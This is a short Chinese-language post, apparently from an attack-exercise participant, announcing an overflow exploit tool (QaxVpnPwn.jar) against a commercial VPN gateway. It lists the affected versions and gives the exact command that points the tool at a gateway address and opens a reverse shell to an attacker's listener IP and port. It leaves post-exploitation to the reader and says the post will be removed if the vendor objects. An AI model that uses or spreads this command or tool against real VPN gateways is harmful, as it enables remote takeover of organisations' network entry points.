某信vpn pwn溢出

已经看到有别的队伍在打了，预告一波，晚点放

某信vpn pwn溢出，可执行命令反弹shell，不过设备底层的系统阉割掉了很多东西，怎么后利用大家自己研究吧。

远古版本的3某0界面的vpn只有很小一部分能打，q某x界面的大多数都能打（23年3月发布的这款之前）

一键反弹：

java -jar QaxVpnPwn.jar -t vpn网关地址 -p vpn网关端口 -re_t 反弹监听ip -re_p 反弹监听端口

example：
java -jar QaxVpnPwn.jar -t vpn.xxx.com -p 443 -re_t x.x.x.x -re_p xxx

1、同目录的这些dll一个都不要少（可能部分dll多余了，但是调试的时候太乱了就全放进来了），不然可能打不成功。

2、pwn类型的洞没办法跟之前一样贴http数据包，想深入研究的可以自己逆向～

3、公关就删！